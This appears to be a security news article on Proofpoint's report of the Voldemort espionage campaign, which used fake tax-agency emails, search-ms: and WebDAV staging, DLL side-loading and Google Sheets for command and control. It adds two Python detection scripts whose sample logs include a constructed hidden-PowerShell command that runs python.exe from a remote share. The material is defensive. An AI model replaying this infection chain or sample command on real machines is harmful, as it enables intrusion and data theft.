Monday, March 24, 2025

Hackers Use Google Sheets to Manage Malware in Likely Espionage Campaign

Cybersecurity researchers have uncovered a new malware campaign that uses Google Sheets as a command-and-control (C2) mechanism.

Proofpoint first detected the activity on August 5, 2024. It involves impersonating tax authorities from governments in Europe, Asia, and the United States with the aim of targeting more than 70 organizations worldwide by means of a custom tool called Voldemort, which is capable of gathering information and delivering additional payloads.

The targeted industries include insurance, government, media, manufacturing, telecom, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, and energy.

The suspected cyber espionage activity has not been attributed to any known threat actor. The attacks have involved the sending of as many as 20,000 emails.

These emails, which purport to come from tax authorities in the United States, the United Kingdom, France, Germany, Italy, India, and Japan, warn recipients about changes to their tax filings and urge them to click on Google AMP Cache URLs that redirect to an intermediate landing page.

The landing page inspects the User-Agent string to check whether the visitor is running Windows. If so, it abuses the search-ms: URI protocol handler to present a Windows shortcut (LNK) file, disguised as a PDF with an Adobe Acrobat Reader icon, in an attempt to trick the victim into opening it.

Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson explained that if the LNK is executed, “it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (\library\), passing a Python script on a fourth share (\resource\) on the same host as an argument.”

“This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share.”

The Python script collects system information, sends it to an actor-controlled domain as a Base64-encoded string, displays a decoy PDF to the user, and downloads a password-protected ZIP file from OpenDrive.

The ZIP archive holds two files: a legitimate program, CiscoCollabHost.exe, that is susceptible to DLL side-loading, and a malicious DLL named CiscoSparkLauncher.dll (also known as Voldemort) that the program sideloads.
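The infection chain described above (search-ms: handler, PowerShell launching python.exe from a WebDAV share, and a DLL sideloaded next to a legitimate executable) leaves distinctive traces in endpoint telemetry. The following is an added detection example written for this page, not code from Proofpoint or from the campaign. It runs three behavioural rules over constructed Sysmon-style process-creation and image-load records; the hostnames, user, paths and the key=value log format are assumptions, and only the two file names come from the article.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style records in key=value form: EventID=1 is process creation,
# EventID=7 is image (DLL) load. Hostnames, users and paths are invented for this example;
# CiscoCollabHost.exe / CiscoSparkLauncher.dll are the file names reported in the article.
SAMPLE_EVENTS = [
    r'EventID=1 ParentImage="C:\Windows\explorer.exe" Image="C:\Program Files\Google\Chrome\Application\chrome.exe" CommandLine="chrome.exe --profile-directory=Default"',
    r'EventID=1 ParentImage="C:\Program Files\Google\Chrome\Application\chrome.exe" Image="C:\Windows\explorer.exe" CommandLine="C:\Windows\explorer.exe search-ms:query=tax_return&crumb=location:\\webdav.example\share"',
    r'EventID=1 ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -w hidden \\webdav.example\library\python.exe \\webdav.example\resource\stage.py"',
    r'EventID=1 ParentImage="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Image="\\webdav.example\library\python.exe" CommandLine="python.exe \\webdav.example\resource\stage.py"',
    r'EventID=7 Image="C:\Users\alice\Downloads\CiscoCollabHost.exe" ImageLoaded="C:\Users\alice\Downloads\CiscoSparkLauncher.dll"',
    r'EventID=7 Image="C:\Program Files\Vendor\app.exe" ImageLoaded="C:\Windows\System32\kernel32.dll"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# \\host\share\... ; the host part also admits WebDAV mini-redirector forms such as host@SSL@443
UNC_RE = re.compile(r'\\\\[\w.\-@]+\\[^\s"]*')
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "python.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories where co-located DLL loads are expected; anything else is user-writable territory.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict (quoted values may contain spaces)."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in KV_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list when benign)."""
    hits: List[str] = []
    if event.get("EventID") == "1":
        image, cmd = event.get("Image", ""), event.get("CommandLine", "")
        # Rule 1: the search-ms: handler lands in explorer.exe; from a browser parent it
        # means a web page opened an Explorer search window, typically over a remote share.
        if basename(image) == "explorer.exe" and "search-ms:" in cmd.lower():
            hits.append("search-ms URI handler invoked")
        # Rule 2: a script host or interpreter whose own image, or whose arguments,
        # point at a UNC/WebDAV path: code executing without ever touching local disk.
        if basename(image) in SCRIPT_HOSTS and (UNC_RE.search(image) or UNC_RE.search(cmd)):
            hits.append("script host referencing remote share")
    elif event.get("EventID") == "7":
        exe, dll = event.get("Image", ""), event.get("ImageLoaded", "")
        # Rule 3: a DLL loaded from the executable's own directory when that directory
        # is outside the trusted install locations, the classic side-loading shape.
        if dirname(exe) == dirname(dll) and not dirname(exe).startswith(TRUSTED_DIRS):
            hits.append("possible DLL side-loading")
    return hits


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run every rule over every record; returns (record index, rule name) pairs."""
    return [(i, hit) for i, line in enumerate(lines) for hit in detect(parse_event(line))]


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit}")
```

Rule 3 will also fire on portable applications and Python virtual environments that legitimately load co-located DLLs from user directories, so in practice pair it with the DLL's signature status and prevalence before alerting; rules 1 and 2 have far fewer benign causes in an enterprise fleet and are worth alerting on directly.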

Voldemort is a custom backdoor written in C with capabilities to gather information and load next-stage payloads. The malware uses Google Sheets for C2 and data exfiltration, and it can also execute commands sent by the operators.
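Because the Google Sheets API is legitimate traffic on almost every network, a backdoor that uses it for C2 cannot be caught by destination alone. The following is an added hunting example written for this page, not Proofpoint's detection logic or anything from the malware: it groups constructed web-proxy log lines by originating process, skips the clients that are expected to talk to Sheets, and then looks for the two things a backdoor does that a user does not, polling a spreadsheet on a fixed cadence and obtaining its own OAuth token. The log format, hostnames, spreadsheet IDs, timings and the allowlist are all assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List
from urllib.parse import urlparse

# Constructed web-proxy log lines (host, user, spreadsheet IDs and timing are invented).
# A browser session and an unknown process both reach the Google Sheets API; only the
# latter polls on a fixed cadence and first fetches an OAuth token on its own.
SAMPLE_PROXY_LOG = [
    "2024-08-06T09:00:03Z host=WS042 user=alice process=chrome.exe method=GET url=https://sheets.googleapis.com/v4/spreadsheets/1AbCdEf/values/Sheet1 status=200",
    "2024-08-06T09:07:41Z host=WS042 user=alice process=chrome.exe method=PUT url=https://sheets.googleapis.com/v4/spreadsheets/1AbCdEf/values/Sheet1 status=200",
    "2024-08-06T09:31:12Z host=WS042 user=alice process=chrome.exe method=GET url=https://sheets.googleapis.com/v4/spreadsheets/1AbCdEf/values/Sheet1 status=200",
    "2024-08-06T09:10:00Z host=WS042 user=alice process=CiscoCollabHost.exe method=POST url=https://oauth2.googleapis.com/token status=200",
    "2024-08-06T09:10:01Z host=WS042 user=alice process=CiscoCollabHost.exe method=GET url=https://sheets.googleapis.com/v4/spreadsheets/9ZyXwV/values/Sheet1 status=200",
    "2024-08-06T09:11:01Z host=WS042 user=alice process=CiscoCollabHost.exe method=GET url=https://sheets.googleapis.com/v4/spreadsheets/9ZyXwV/values/Sheet1 status=200",
    "2024-08-06T09:12:02Z host=WS042 user=alice process=CiscoCollabHost.exe method=GET url=https://sheets.googleapis.com/v4/spreadsheets/9ZyXwV/values/Sheet1 status=200",
    "2024-08-06T09:13:01Z host=WS042 user=alice process=CiscoCollabHost.exe method=PUT url=https://sheets.googleapis.com/v4/spreadsheets/9ZyXwV/values/Sheet1 status=200",
    "2024-08-06T09:14:01Z host=WS042 user=alice process=CiscoCollabHost.exe method=GET url=https://sheets.googleapis.com/v4/spreadsheets/9ZyXwV/values/Sheet1 status=200",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) process=(?P<process>\S+) "
    r"method=(?P<method>\S+) url=(?P<url>\S+) status=(?P<status>\d+)$"
)
# Processes for which Sheets API traffic is expected (assumed allowlist; extend per environment).
EXPECTED_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "excel.exe", "outlook.exe"}
SHEETS_HOST, TOKEN_HOST = "sheets.googleapis.com", "oauth2.googleapis.com"


def parse_line(line: str) -> Dict:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparseable proxy line: {line!r}")
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
    e["api_host"] = urlparse(e["url"]).hostname
    return e


def hunt(lines: List[str], min_polls: int = 4, max_cv: float = 0.25) -> List[Dict]:
    """Flag non-allowlisted processes using the Sheets API; report cadence and write activity."""
    by_proc: Dict[tuple, List[Dict]] = defaultdict(list)
    for e in map(parse_line, lines):
        if e["api_host"] in (SHEETS_HOST, TOKEN_HOST):
            by_proc[(e["host"], e["process"])].append(e)

    findings = []
    for (host, proc), events in by_proc.items():
        if proc.lower() in EXPECTED_CLIENTS:
            continue
        sheets = sorted((e for e in events if e["api_host"] == SHEETS_HOST), key=lambda e: e["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(sheets, sheets[1:])]
        # Beaconing check: enough polls, and the spread of inter-request gaps is small
        # relative to their mean (coefficient of variation at or below max_cv).
        regular = len(sheets) >= min_polls and statistics.pstdev(gaps) <= max_cv * statistics.mean(gaps)
        findings.append({
            "host": host,
            "process": proc,
            "sheets_requests": len(sheets),
            # PUT/POST to the values endpoint is how results would be written back (exfiltration).
            "writes": sum(1 for e in sheets if e["method"] in ("PUT", "POST")),
            # A process minting its own OAuth token is not a user clicking around in a browser.
            "token_requests": sum(1 for e in events if e["api_host"] == TOKEN_HOST),
            "mean_gap_s": round(statistics.mean(gaps), 1) if gaps else None,
            "regular_polling": regular,
        })
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_PROXY_LOG):
        print(f)
```

Expect noise from legitimate non-browser Google clients (drive sync tools, add-ins, automation scripts using service accounts); those are best handled by extending the allowlist per host after review rather than by loosening the cadence threshold, since a steady 60-second poll from a process named after a collaboration tool that has no business with spreadsheets is exactly the signal to keep.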

According to Proofpoint, the behavior is consistent with advanced persistent threat (APT) activity but has “cybercrime vibes,” since it employs techniques that are common in the cybercrime ecosystem.

“Threat actors utilize external file sharing resources, particularly WebDAV and Server Message Block (SMB), by abusing file schema URIs to stage malware,” the researchers explained. They added that this is accomplished by linking to a remote server that hosts the malicious content using the ‘file://’ schema.

This technique has been increasingly adopted by initial access brokers (IABs) to deliver malware families such as Latrodectus, DarkGate, and XWorm.

Proofpoint also said it reviewed the Google Sheet and identified a total of six victims, one of which is believed to be a “known researcher” or a sandbox.

The unusual profile of the campaign raises the possibility that the threat actors first cast a wide net before zeroing in on a small number of targets. It is also plausible that the attackers, likely with varying degrees of technical proficiency, intended to infect several organizations.

“While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives,” the investigators stated.

“The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign.”

The development coincides with the discovery by Netskope Threat Labs of an updated version of the Latrodectus malware (1.4) that adds two new backdoor commands and a new C2 endpoint. The commands allow the malware to download shellcode from a specified server and retrieve arbitrary files from a remote location.

“Latrodectus has been evolving pretty fast, adding new features to its payload,” security researcher Leandro Fróes said. “The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants.”
